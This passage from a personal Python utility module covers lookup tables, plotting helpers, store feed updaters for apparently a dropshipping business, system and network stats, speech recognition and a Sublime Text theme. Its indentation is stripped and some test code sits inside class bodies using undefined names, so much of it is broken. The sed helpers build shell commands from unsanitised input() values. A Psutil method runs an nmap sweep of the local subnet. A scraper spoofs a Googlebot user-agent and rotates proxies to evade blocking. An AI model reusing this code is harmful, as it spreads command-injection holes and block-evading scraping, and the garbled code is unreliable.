'KZ': 'Kazakhstan', 'LA': "Lao People's Democratic Republic", 'LB': 'Lebanon', 'LC': 'Saint Lucia', 'LI': 'Liechtenstein', 'LK': 'Sri Lanka', 'LR': 'Liberia', 'LS': 'Lesotho', 'LT': 'Lithuania', 'LU': 'Luxembourg', 'LV': 'Latvia', 'LY': 'Libya', 'MA': 'Morocco', 'MC': 'Monaco', 'ME': 'Montenegro', 'MF': 'Saint Martin (French part)', 'MG': 'Madagascar', 'MH': 'Marshall Islands', 'ML': 'Mali', 'MM': 'Myanmar', 'MN': 'Mongolia', 'MO': 'Macao', 'MP': 'Northern Mariana Islands', 'MQ': 'Martinique', 'MR': 'Mauritania', 'MS': 'Montserrat', 'MT': 'Malta', 'MU': 'Mauritius', 'MV': 'Maldives', 'MW': 'Malawi', 'MX': 'Mexico', 'MY': 'Malaysia', 'MZ': 'Mozambique', 'NA': 'Namibia', 'NC': 'New Caledonia', 'NE': 'Niger', 'NF': 'Norfolk Island', 'NG': 'Nigeria', 'NI': 'Nicaragua', 'NL': 'Netherlands', 'NO': 'Norway', 'NP': 'Nepal', 'NR': 'Nauru', 'NU': 'Niue', 'NZ': 'New Zealand', 'OM': 'Oman', 'PA': 'Panama', 'PE': 'Peru', 'PF': 'French Polynesia', 'PG': 'Papua New Guinea', 'PH': 'Philippines', 'PK': 'Pakistan', 'PL': 'Poland', 'PM': 'Saint Pierre and Miquelon', 'PN': 'Pitcairn', 'PR': 'Puerto Rico', 'PT': 'Portugal', 'PW': 'Palau', 'PY': 'Paraguay', 'QA': 'Qatar', 'RE': 'Réunion', 'RO': 'Romania', 'RS': 'Serbia', 'RU': 'Russian Federation', 'RW': 'Rwanda', 'SA': 'Saudi Arabia', 'SB': 'Solomon Islands', 'SC': 'Seychelles', 'SD': 'Sudan', 'SE': 'Sweden', 'SG': 'Singapore', 'SI': 'Slovenia', 'SJ': 'Svalbard and Jan Mayen', 'SK': 'Slovakia', 'SL': 'Sierra Leone', 'SM': 'San Marino', 'SN': 'Senegal', 'SO': 'Somalia', 'SR': 'Suriname', 'SS': 'South Sudan', 'ST': 'Sao Tome and Principe', 'SV': 'El Salvador', 'SX': 'Sint Maarten (Dutch part)', 'SY': 'Syrian Arab Republic', 'SZ': 'Swaziland', 'TC': 'Turks and Caicos Islands', 'TD': 'Chad', 'TF': 'French Southern Territories', 'TG': 'Togo', 'TH': 'Thailand', 'TJ': 'Tajikistan', 'TK': 'Tokelau', 'TL': 'Timor-Leste', 'TM': 'Turkmenistan', 'TN': 'Tunisia', 'TO': 'Tonga', 'TR': 'Turkey', 'TT': 'Trinidad and Tobago', 'TV': 'Tuvalu', 'UA': 'Ukraine', 'UG': 'Uganda', 'UM': 'United States Minor Outlying Islands', 'US': 'United States', 'UY': 'Uruguay', 'UZ': 'Uzbekistan', 'VA': 'Holy See (Vatican City State)', 'VC': 'Saint Vincent and the Grenadines', 'VN': 'Viet Nam', 'VU': 'Vanuatu', 'WF': 'Wallis and Futuna', 'WS': 'Samoa', 'YE': 'Yemen', 'YT': 'Mayotte', 'ZA': 'South Africa', 'ZM': 'Zambia', 'ZW': 'Zimbabwe'}
canada_province_codes = {
'AB' : 'Alberta', 'BC' : 'British Columbia', 'MB' : 'Manitoba', 'NB' : 'New Brunswick', 'NL' : 'Newfoundland and Labrador', 'NS' : 'Nova Scotia', 'NT' : 'Northwest Territories', 'NU' : 'Nunavut', 'ON' : 'Ontario', 'PE' : 'Prince Edward Island', 'QC' : 'Quebec', 'SK' : 'Saskatchewan', 'YT' : 'Yukon'}
def get_state(self,io):
return self.states[io]if(2==len(io))else(dict(zip(self.states.values(),self.states.keys()))[io])
def get_country(self,io):
return self.country_code_dict[io]if(2==len(io))else(dict(zip(self.country_code_dict.values(),self.country_code_dict.keys()))[io])
def get_canada_provinces(self,io):
return self.canada_province_codes[io]if(2==len(io))else(dict(zip(self.canada_province_codes.values(),self.canada_province_codes.keys()))[io])
globals().update(locals())
"""
print("AK -> %s" % (Locations().get_state("AK")))
print("Alaska -> %s" % (Locations().get_state("Alaska")))
print("AD -> %s" % (Locations().get_country("AD")))
print("Andorra -> %s" % (Locations().get_country("Andorra")))
print("AB -> %s" % (Locations().get_canada_provinces("AB")))
print("Alberta -> %s" % (Locations().get_canada_provinces("Alberta")))
"""
class My_Matplotlib(object):
def __init__(self):
import matplotlib.pyplot as plt
globals().update(locals())
self.plot_number = 211
def plot(self, *args, plot_type='scatterplot',**kwargs):
plt.subplot(self.plot_number)if(True==kwargs.get("newplot",False))else(None)
if plot_type == 'lineplot':
plt.plot(*args, '-', label=kwargs.get("label",None))
elif plot_type == 'scatterplot':
plt.plot(*args, '.')
elif plot_type == 'histogram':
plt.hist(*args, bins=20)
plt.xlabel(kwargs.get("xlabel","x"))
plt.ylabel(kwargs.get("ylabel","y"))
plt.title(kwargs.get("title","title"))
plt.legend()
if kwargs.get("newplot",False) == True: self.plot_number = self.plot_number + 1
return
""" ::: Caffeine example (12 hours) ::: """
x = My_Matplotlib()
x.plot([100, 200, 180, 140, 120, 110, 100, 100, 100, 100, 100, 100], newplot=False, label="alertness")
x.show()
def histogram_example(self):
population_ages = list(range(18,65))
ids = [x for x in range(len(population_ages))]
bins = list(range(10,100, 10))
plt.hist(population_ages, bins=10, histtype="bar", rwidth=0.8)
plt.show()
def pairplot(self, data, headers):
import pandas as pd
import seaborn as sb
import matplotlib.pyplot as plt
# %matplotlib tk
CSV().DictWriteWithHeaders("tmp.csv", data, headers, delimiter = "\t")
data = pd.read_csv("tmp.csv", delimiter = "\t")
sb.pairplot(data)
plt.show()
os.system("rm tmp.csv")
def barchart(self, x_indices=[0,1,2,3,4], y_indices=[10,5,10,5,10], **kwargs):
#x_indices=[0,1,2,3,4]
#y_indices=[10,5,10,5,10],
import matplotlib.pyplot as plt
plt.bar(x_indices, y_indices)
plt.ylabel(kwargs.get("ylabel"))if("ylabel" in kwargs)else(1)
plt.xticks(list(range(len(kwargs.get("xticks")))), kwargs.get("xticks"))if("xticks" in kwargs)else(1)
plt.title(kwargs.get("title"))if("title" in kwargs)else(1)
plt.show()
# kwargs may include:
# 1. align="center"
# 2. alpha="0.5"
def show(self):
plt.show()
class My_Meditations:
def __init__(self):
self.fuckboi = Browser()("sele",65)
def wtf(self):
OSA.log("LOL",tp=1-0)
class On_Exec:
""" shows that if you use exec whilst locals are there, post-exec locals stay as pre-exec, even if used in exec. so exec needs to use new keys. """
"pre-exec"
def versioncheck(x):
exec("import selenium; bprint(selenium.__version__); x = selenium.__version__",globals())
return x
def quadim1(x):
exec("y = 5",globals())
print(y)
return y
def quadim2(x):
exec("x = 5",globals())
print(x)
return x
def quadim3(x):
exec("y = 5",globals())
print(y)
return y
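    # Illustration of the note above (my sketch, CPython semantics):
    """
    def f():
        x = 1
        exec("x = 5")             # writes into a throwaway locals dict, not f's real locals
        return x                  # still 1
    def g():
        exec("y = 5", globals())  # writing through an explicit dict (a new key) does stick
        return y                  # 5, looked up from globals
    """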
class Updater:
__init__ = lambda self: self.__dict__.update(
{
"GhostProductUpdate": lambda: 0==(Time()-Time(max(key("last_check",Filter(GhostProductUpdate,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or GhostProduct().productghosts(Muta()().store_abbre),
"ProductsFeed": lambda: 0==(Time()-Time(max(key("last_check",Filter(ProductsFeed,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or ProductsFeed().ProductsFeed(Muta()().store_abbre),
"LineitemsFeed": lambda: 0==(Time()-Time(max(key("last_check",Filter(LineitemsFeed,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or LineitemsFeed().LineitemsFeed(Muta()().store_abbre),
"AdsetUpdates": lambda: lmap(lambda i: 2>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).hours() or July_Adset_Utilities().update_advertisement_all(id=i.id), Filter(Adset,shop_abbreviation=Muta()().store_abbre)),
"LineitemUpdates": lambda: lmap(lambda i: 3>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).hours() or Get(Lineitem,id=i.id).update_tracker_data(), Filter(Lineitem,shop=Muta()().store_abbre)),
"Aliexpressorder_update": lambda: 0==(Time()-Time(max(key("last_check",Filter(Aliexpressorder_update,shop=Muta()().store_abbre))+[(Date()-100)()]))).days or Aliexpressorderpager().get_urls((Date()-7)(),(Date()-0)(),get_order_info=False),
"ProductUpdates": lambda: lmap(lambda i: 2>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).days or i.Refresh() , Filter(Product,shop=Muta()().store_abbre)),
"New_EmailUpdates": lambda: New_Email().new_email_set(Muta()().store_abbre),
"Aliexpressorder_event_update": lambda: Aliexpressorder_event().run(Muta()().store_abbre),
"Update_TertiaryActions": lambda: TertiaryAction().add(Muta()().store_abbre),
"Update_Payments": lambda: Payment().add(),
"Update_Payouts": lambda: Payout().add(),
})
def GhostProductUpdate(self):
for i in All(Shop):
GhostProduct().productghosts(i.shop_abbreviation)
def ProductsFeed(self):
for i in All(Shop):
ProductsFeed().ProductsFeed(i.shop_abbreviation)
def LineitemsFeed(self):
for i in All(Shop):
LineitemsFeed().LineitemsFeed(i.shop_abbreviation)
def AdsetUpdates(self):
for a in All(Shop):
for b in Filter(Adset,shop_abbreviation=a.shop_abbreviation):
July_Adset_Utilities().update_advertisement_all(id=b.id)
def LineitemUpdates(self):
for a in All(Shop):
for b in Filter(Lineitem,shop=a.shop_abbreviation):
Get(Lineitem,id=b.id).update_tracker_data()
"""
0==(Time()-Time(max(key("last_check",All(GhostProductUpdate))+[(Date()-100)()]))).days or GhostProduct().productghostsall()
0==(Time()-Time(max(key("last_check",All(Aliexpressorder_update))+[(Date()-100)()]))).days or Aliexpress_Core(ph=False).get_urls(7,0)
0==(Time()-Time(max(key("last_check",All(ProductsFeed))+[(Date()-100)()]))).days or ProductsFeed().ProductsFeedAll()
0==(Time()-Time(max(key("last_check",All(LineitemsFeed))+[(Date()-100)()]))).days or LineitemsFeed().LineitemsFeedAll()
lmap(lambda i: 2>=(Time()-Time(or_list(i.last_check,(Time()-100)()))).days or Aliexpress_Products().refresh_product_inventory(i.id) , All(Product))
Updater().GhostProductUpdate()
"""
class Pickles:
def savepickles(self,*args,**kws):
pickle.dump([i for i in args if type(i)!=str][0],open([i for i in args if type(i)==str][0],'wb'))
ifdo(lambda:kws.get('copypickles'),lambda:Pickles().savepickles([i for i in args if type(i)!=str][0],kws['copypickles']))
return args[0]
def loadpickles(self,*args,**kws):
ifdo(lambda:os.path.exists(args[0])==False,lambda:Pickles().savepickles(kws.get('default'),args[0]) )
return pickle.load(open(args[0],'rb'))
def solodump(self,obj,io,**kwargs):
pickles=Pickles().loadpickles(io,default=[])
identifier = kwargs['identifier']
print(obj,identifier)
possible_id=obj[identifier]
news=key(identifier,pickles)
q=None
if possible_id in news:
q=[i for i in pickles if i[identifier]==obj[identifier]][0]
else:
None
if q==None:
pickles.append(obj)
else:
indexer=pickles.index(q)
pickles[indexer]=obj
Pickles().savepickles(pickles,io,copypickles='store/%s%s'%(str(Time()).replace(':',''),io))
return obj
    """ example:
    x = [{'id': 1, 'fn': 2}]
    Pickles().savepickles(x, 'lol.pkl')
    """
class Psutil(DecisionTree):
def tests(self):
builtin_print( "net_connections #1: %s" % str(self.net_connections()[0]) )
builtin_print( "net_io_counters: %s" % str(self.net_io_counters()) )
builtin_print( "sensors_battery: %s" % str(self.sensors_battery()) )
builtin_print( "boot_time: %s" % str(self.boot_time()) )
builtin_print( "virtual_memory: %s" % str(self.virtual_memory()) )
builtin_print( "cpu_count: %s" % str(self.cpu_count()) )
builtin_print( "disk_partitions: %s" % str(self.disk_partitions()) )
builtin_print( "disk_usage: %s" % str(self.disk_usage()) )
builtin_print( "GetHumanReadable: %s" % str(self.GetHumanReadable(self.disk_usage().total)) )
def get_network_interface(self):
x = subprocess.getoutput("route get 10.10.10.10")
redprint("route get 10.10.10.10\n==RESULT==\n\n{}\n\n".format(x))
return re.findall(r"interface: (.*)", x)[0]
def get_mac_lan_ip_address(self):
w = "ipconfig getifaddr {}".format(self.get_network_interface())
x = subprocess.getoutput(w)
redprint("{}\n==RESULT==\n\n{}\n\n".format(w,x))
return x
def nmap(self):
w = "sudo nmap -sP {}.1/24".format(Join(".",self.get_mac_lan_ip_address().split(".")[:3]))
x = subprocess.getoutput(w)
z = re.findall(r"Nmap scan report for (.*) .*\((.*)\)",x)
redprint("{}\n==result\n\n{}\n\n{}\n\n".format(w,x,json.dumps(z,indent=4)))
return z
def nonsudo_nmap(self):
w = "nmap -sP {}.1/24".format(Join(".",self.get_mac_lan_ip_address().split(".")[:3]))
x = subprocess.getoutput(w)
z = re.findall(r"Nmap scan report for (.*) .*\((.*)\)",x)
redprint("{}\n==result\n\n{}\n\n{}\n\n".format(w,x,json.dumps(z,indent=4)))
return z
def nmap_consistent(self,c=1):
while True:
if(len(self.nonsudo_nmap())) != c:
OSA().notify("lol")
def net_connections(self):
return psutil.net_connections(kind='inet')
def net_io_counters(self):
return psutil.net_io_counters(pernic=False, nowrap=True)
def sensors_battery(self):
return psutil.sensors_battery()
def boot_time(self):
        import datetime
        # e.g. '2018-08-29 04:23:28'
        return datetime.datetime.fromtimestamp(psutil.boot_time()).strftime("%Y-%m-%d %H:%M:%S")
def virtual_memory(self):
mem = psutil.virtual_memory()
return mem
def cpu_count(self):
return psutil.cpu_count()
""" 8 """
def disk_partitions(self):
return psutil.disk_partitions()
def disk_usage(self):
return psutil.disk_usage("/")
@staticmethod
def GetMachineReadable(HumanReadable):
suffixes=['B','KB','MB','GB','TB']
x = int(re.findall("[0-9]+",HumanReadable)[0])
y = re.findall(r"[a-zA-Z]+",HumanReadable)[0]
z = suffixes.index(y)
for i in range(z):
x = x*1024
return x
@staticmethod
def GetHumanReadable(size,precision=2):
suffixes=['B','KB','MB','GB','TB']
suffixIndex = 0
while size > 1024 and suffixIndex < 4:
suffixIndex += 1 #increment the index of the suffix
size = size/1024.0 #apply the division
return "%.*f%s"%(precision,size,suffixes[suffixIndex])
def GetLetterReadable(self,v):
return v if v<= 999 else(str(int(v/1000)) + "K")if(1000 <= v <= 999999)else(str(int(v/1000000)) + "M")if(1000000 <= v <= 999999999)else(str(int(v/1000000000)) + "B")if(1000000000 <= v <= 999999999999)else("?")
""" tests """
for i in [0,999,1000,50000,500000,5000000,5000000000,50000000,50000000000,5000000000000,6456498098,123491823,123123]:
print(x(i))
def SpeedTest(self, download = True, upload = True, verbose = True):
start_time = datetime.now()
import speedtest
servers = []
# If you want to test against a specific server
# servers = [1234]
s = speedtest.Speedtest()
s.get_servers(servers)
s.get_best_server()
if download == True:
s.download()
if upload == True:
s.upload()
s.results.share()
results_dict = s.results.dict()
results_dict = AttrDict(results_dict)
end_time = datetime.now()
elapsed_time = end_time.__sub__(start_time)
elapsed_time_seconds = elapsed_time.seconds
elapsed_time_microseconds = elapsed_time.microseconds / 1000000
elapsed_time_full = elapsed_time_seconds + elapsed_time_microseconds
elapsed_time_full = round(elapsed_time_full, 2)
time.sleep(1)
if verbose == True:
greenprint("speed test results time taken: %s seconds" % elapsed_time_full)
if verbose == True:
greenprint("")
time.sleep(1)
if verbose == True:
greenprint(":Results:")
download_speed = None
download_speed_readable = None
if download == True:
download_speed = results_dict.download
download_speed_readable = Psutil().GetLetterReadable(download_speed)
if verbose == True:
greenprint("download speed: %s" % download_speed_readable)
upload_speed = None
upload_speed_readable = None
if upload == True:
upload_speed = results_dict.upload
upload_speed_readable = Psutil().GetLetterReadable(upload_speed)
if verbose == True:
greenprint("upload speed: %s" % upload_speed_readable)
if download == True and upload == True:
return download_speed_readable, upload_speed_readable
elif download == True and upload == False:
return download_speed_readable
elif download == False and upload == True:
return upload_speed_readable
else:
return None
""" :Test:
results = []
results.append(Psutil().SpeedTest(download = True, upload = True))
results.append(Psutil().SpeedTest(download = True, upload = False))
results.append(Psutil().SpeedTest(download = False, upload = True))
results.append(Psutil().SpeedTest(download = False, upload = False))
assert len(results[0]) == 2
assert results[1]
assert results[2]
assert results[3] == None
greenprint(results)
"""
class RandomWord:
def __init__(self):
x = get_random_word()
print(x)
os.system("say '[[volm 0.35]] %s'"%(x))
[os.system("say '[[volm 0.35]] %s'"%(i)) for i in " ".join(x).split(" ")]
try:
y = dictionarymeaning(x)
print(y)
os.system('say """[[volm 0.35]] %s"""'%(y))
except Exception as e:
pass
RandomGeneratedWords().add(x)
print("")
class SkuAlgorithm:
a1 = lambda self, x, **kwargs: [setitem(kwargs,"a","".join(lmap(str,lmap(ord, shuffled(x))))),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a1(x)) )][2]
a2 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_alphabetical_string(3),generate_one_alphabetical_string(4),generate_one_alphabetical_string(4)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a2(x)))][2]
a3 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_random_number(3),generate_one_random_number(4),generate_one_random_number(4)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a3(x)))][2]
a4 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_random_number(3),generate_one_alphabetical_string(4),generate_one_alphabetical_string(4)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a4(x)))][2]
a5 = lambda self, x, **kwargs: [setitem(kwargs,"a","-".join([generate_one_random_number(7),generate_one_alphabetical_string(2),generate_one_alphabetical_string(5)]).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a5(x)))][2]
a6 = lambda self, x, **kwargs: [setitem(kwargs,"a",(generate_one_alphabetical_string(2)+"{"+generate_one_random_number(4)+"}"+";"+generate_one_alphabetical_string(10)).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a6(x)))][2]
a7 = lambda self, x, **kwargs: [setitem(kwargs,"a",("".join(lmap(str,[random.randrange(7,10) for i in range(3)]))+"$"+generate_one_alphanumeric_string(10)).upper()),exec("assert len(kwargs['a']) <=255"),((kwargs["a"])if(kwargs["a"] not in key("nsku",All(Sku)))else(self.a7(x)))][2]
rnda = lambda self: getattr(self, random.choice([i for i in dir(self) if i.startswith("a")]))
"""
blueprint(SkuAlgorithm().a1('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a2('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a3('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a4('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a5('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a6('["sku-1-123", "sku-2-asdfjpmv2912"]'))
blueprint(SkuAlgorithm().a7('["sku-1-123", "sku-2-asdfjpmv2912"]'))
"""
class Speech_Recognition:
@timeit
def recognize_sphinx(self, AUDIO_FILE, language="en-US"):
import speech_recognition as sr
# obtain path to "english.wav" in the same folder as this script
from os import path
#AUDIO_FILE = "out.wav"#path.join(path.dirname(path.realpath(__file__)), "out.wav")
# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), "french.aiff")
# AUDIO_FILE = path.join(path.dirname(path.realpath(__file__)), "chinese.flac")
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(AUDIO_FILE) as source:
audio = r.record(source) # read the entire audio file
# recognize speech using Sphinx
try:
print("Sphinx thinks you said " + r.recognize_sphinx(audio, language="fr-FR"))
except sr.UnknownValueError:
print("Sphinx could not understand audio")
except sr.RequestError as e:
print("Sphinx error; {0}".format(e))
@timeit
def recognize_google(self, AUDIO_FILE = "out.wav", language="en-US"):
import speech_recognition as sr
# obtain path to "english.wav" in the same folder as this script
from os import path
#AUDIO_FILE = "out.wav"#path.join(path.dirname(path.realpath(__file__)), "out.wav")
# use the audio file as the audio source
r = sr.Recognizer()
with sr.AudioFile(AUDIO_FILE) as source:
audio = r.record(source) # read the entire audio file
# recognize speech using Google Speech Recognition
try:
# for testing purposes, we're just using the default API key
# to use another API key, use `r.recognize_google(audio, key="GOOGLE_SPEECH_RECOGNITION_API_KEY")`
# instead of `r.recognize_google(audio)`
print("Google Speech Recognition thinks you said " + r.recognize_google(audio))
except sr.UnknownValueError:
print("Google Speech Recognition could not understand audio")
except sr.RequestError as e:
print("Could not request results from Google Speech Recognition service; {0}".format(e))
class SED(DecisionTree):
def SED_RECURSIVELY(self):
import glob
dir = input("dir?: ")
os.chdir(dir)
ext = input("ext?: ")
old = input("old?: ")
new = input("new?: ")
os.chdir("../")
files = glob.glob('**/*%s'%ext, recursive=True)
print(files)
old = old.replace("/", "\\/")
new = new.replace("/", "\\/")
for fn in files:
system("sed -i '' -e s/%s/%s/g %s"%(old,new,fn))
def SED(self):
file = input("file?: ")
old = input("old?: ")
new = input("new?: ")
os.chdir("../")
old = old.replace("/", "\\\/")
new = new.replace("/", "\\\/")
the_string = "sed -i '' -e s/%s/%s/g %s"%(old,new,file)
print("the string: %s" % the_string)
os.system(the_string)
class SimpleRequester:
def __init__(self):
self.proxy_list = get_us_ip_list()
self.s = requests.Session()
self.s.headers = {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.1242123123.com/bot.html)", "authority": "www.aliexpress.com", "upgrade-insecure-requests": "1",}
self.count_current_tries = 0
def get(self, url, textNot="ø"*3, urlNot="ø"*3, status_codeNotNot=200, use_proxy=False, cookies={}):
[self.s.cookies.set(k,v) for k,v in cookies.items()]
r = None
if use_proxy == False:
try:
r = self.s.get(url, timeout=4)
redprint("\nProxy:%s\nUrl:%s\nr.text.find('%s'):%s\nr.url.find('%s'):%s\nstatus_code:%s\nstatus_codeNotNot:%s\ncount_current_tries:%s" % ("ø",url,textNot,r.text.find(textNot),urlNot,r.url.find(urlNot),r.status_code,status_codeNotNot,self.count_current_tries ))
except Exception as e:
                redprint(str(e)[:100])
                ######
                # The request failed without a proxy: rotate the proxy list (move the first proxy to
                # the back) and retry the same request through the next proxy.
                self.proxy_list.append(self.proxy_list.__getitem__(0 ))
                self.proxy_list.__delitem__(0 )
                self.count_current_tries +=1
                return self.get(url, textNot, urlNot, status_codeNotNot=status_codeNotNot, use_proxy=True)
######
else:
try:
r = self.s.get(url, proxies={"https":self.proxy_list[0]}, timeout=4)
redprint("\nProxy:%s\nUrl:%s\nr.text.find('%s'):%s\nr.url.find('%s'):%s\nstatus_code:%s\nstatus_codeNotNot:%s\ncount_current_tries:%s" % (self.proxy_list[0],url,textNot,r.text.find(textNot),urlNot,r.url.find(urlNot),r.status_code,status_codeNotNot,self.count_current_tries ))
except Exception as e:
                redprint(str(e)[:100])
                ######
                # Same recovery as above: rotate to the next proxy and retry, preserving the caller's
                # expected status code.
                self.proxy_list.append(self.proxy_list.__getitem__(0 ))
                self.proxy_list.__delitem__(0 )
                self.count_current_tries +=1
                return self.get(url, textNot, urlNot, status_codeNotNot=status_codeNotNot, use_proxy=True)
######
#redprint("textNot in r.text:%s\n"%(textNot in r.text), "urlNot in r.url:%s\n"% (urlNot in r.url), "status_codeNotNot != r.status_code:%s"%(status_codeNotNot != r.status_code))
is_good = True
if textNot in r.text:
is_good = False
if urlNot in r.url:
is_good = False
if status_codeNotNot != r.status_code:
#if r.status_code == 404: return SOUP("404")
if r.status_code == 404:
is_good = False
return r
if is_good == True:
redprint("success:True")
self.count_current_tries = 0
return r
else:
            self.proxy_list.append(self.proxy_list.__getitem__(0 ))
            self.proxy_list.__delitem__(0 )
            self.count_current_tries +=1
            return self.get(url, textNot, urlNot, status_codeNotNot=status_codeNotNot, use_proxy=True)
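# A minimal usage sketch of SimpleRequester.get. textNot and urlNot are substrings that mark a
# *bad* response (e.g. a captcha page or a login redirect), and status_codeNotNot is the status
# code the response must have; anything else rotates the proxy list and retries. The URL and
# marker strings below are illustrative only.
"""
r = SimpleRequester().get("https://www.aliexpress.com/", textNot="captcha", urlNot="/login", status_codeNotNot=200)
print(r.status_code, len(r.text))
"""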
class SublimeText_Themes(DecisionTree):
# (cbf52c (24bc44))
# (9c8996 (ffffff))
def __init__(self, ):
self.hexes = []
print(" a nice app: http://tmtheme-editor.herokuapp.com/#!/editor/theme/Monokai")
self.functions_sorted = ["normal", "change_colours", "change_comment_colours", "colorama", "change_background_colour"]
self.discovered_colours = {
"teal": "00efaf",
"darkteal": "00afaf", }
self.saved_colour_codes = """
66D9EF
00qfaf
b7e88a # a fun green
3b3d60
c95e46
b6af6c
502846
51c56d
24bc44
a9586a
c1ef4e
c58887
188711
395931 # a nice calm sea green
9d8bcc
83bd5a
e63f57
e343f0
71321a
395931
2a281a
ef6978
02f718 # sharp green
9c8996 # purplish
d4d4ae #
efd2b4 # pinkish
b3e7b2 #
a5ccd7 #
ffffff # white
db7d5a # sandstone aurauric red
1ebd01 # in the cut green
ff1700 # red
b00e2a # funner red
ebfdb4 # a surreal colour
cbf52c # a stay awake green and yellow
4fe1e5 # mega blue
deeabd # draconian white
c1faea # funny room blue
efc98e # desaddening orange
6f7f84 #
d6ddd5 2bfe16
dbf0f7 3ecefb
96f6ce d97462
f55608 bfaafe
d48ee5 0ecb9f
748054 fe3161
e04023 befbf6
af53f4 6d7d31
f59b00 de1939
78a7b2 400939"""
list(map(print, self.saved_colour_codes.split("\n")))
self.theme_path = homepath("~/Library/Application Support/Sublime Text 3/Packages/Color Scheme - Default/Monokai.tmTheme")
self.blank = '\n <!-- \x01 Maybe strings should be whitetext \x02 Functions purple? \x03 Variables blue? \x04 Numbers green? \x05 what about a very dark green for functions?-->\n <?xml version="1.0" encoding="UTF-8"?>\n <!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n <plist version="1.0">\n <dict>\n <key>name</key>\n <string>Monokai</string>\n <key>settings</key>\n <array>\n <dict>\n <key>settings</key>\n <!--\n [[ Original Data ]]\n <dict>\n <key>background</key>\n <string>#__blank__</string> \n <key>caret</key>\n <string>#__blank__</string>\n <key>foreground</key>\n <string>#__blank__</string>\n <key>invisibles</key>\n <string>#__blank__</string>\n <key>lineHighlight</key>\n <string>#__blank__</string>\n <key>selection</key>\n <string>#__blank__</string>\n <key>findHighlight</key>\n <string>#__blank__</string>\n <key>findHighlightForeground</key>\n <string>#__blank__</string>\n <key>selectionBorder</key>\n <string>#__blank__</string>\n <key>activeGuide</key>\n <string>#__blank__</string>\n <key>misspelling</key>\n <string>#__blank__</string>\n <key>bracketsForeground</key>\n <string>#__blank__</string>\n <key>bracketsOptions</key>\n <string>underline</string>\n <key>bracketContentsForeground</key>\n <string>#__blank__</string>\n <key>bracketContentsOptions</key>\n <string>underline</string>\n <key>tagsOptions</key>\n <string>stippled_underline</string>\n </dict>\n -->\n <!--\n https://html-color-codes.info/old/colorpicker.html\n -->\n <dict>\n <key>background</key>\n <string>#000000</string>\n <key>caret</key>\n <string>#__blank__</string>\n <key>foreground</key>\n <string>#__blank__</string>\n <key>invisibles</key>\n <string>#__blank__</string>\n <key>lineHighlight</key>\n <string>#__blank__</string>\n <key>selection</key>\n <string>#000000</string>\n <key>findHighlight</key>\n <string>#__blank__</string>\n <key>findHighlightForeground</key>\n <string>#__blank__</string>\n <key>selectionBorder</key>\n <string>#__blank__</string>\n <key>activeGuide</key>\n <string>#__blank__</string>\n <key>misspelling</key>\n <string>#__blank__</string>\n <key>bracketsForeground</key>\n <string>#__blank__</string>\n <key>bracketsOptions</key>\n <string>underline</string>\n <key>bracketContentsForeground</key>\n <string>#__blank__</string>\n <key>bracketContentsOptions</key>\n <string>underline</string>\n <key>tagsOptions</key>\n <string>stippled_underline</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Comment</string>\n <key>scope</key>\n <string>comment</string>\n <key>settings</key>\n <!--\n [[ Original Data ]]\n <dict>\n <key>foreground</key>\n <string>#{__blank__}</string>\n </dict>\n -->\n <dict>\n <key>foreground</key>\n <string>#FF1700</string>\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>String</string>\n <key>scope</key>\n <string>string</string>\n <key>settings</key>\n <!--\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n -->\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!--"string here" # __blank__ string-->\n </dict>\n </dict>\n <dict>\n <key>name</key>\n <string>Number</string>\n <key>scope</key>\n <string>constant.numeric</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string>\n </dict>\n </dict>\n\n <dict>\n <key>name</key>\n <string>Built-in constant</string>\n <key>scope</key>\n <string>constant.language</string>\n <key>settings</key>\n <dict>\n <key>foreground</key>\n <string>#__blank__</string> <!-- while 
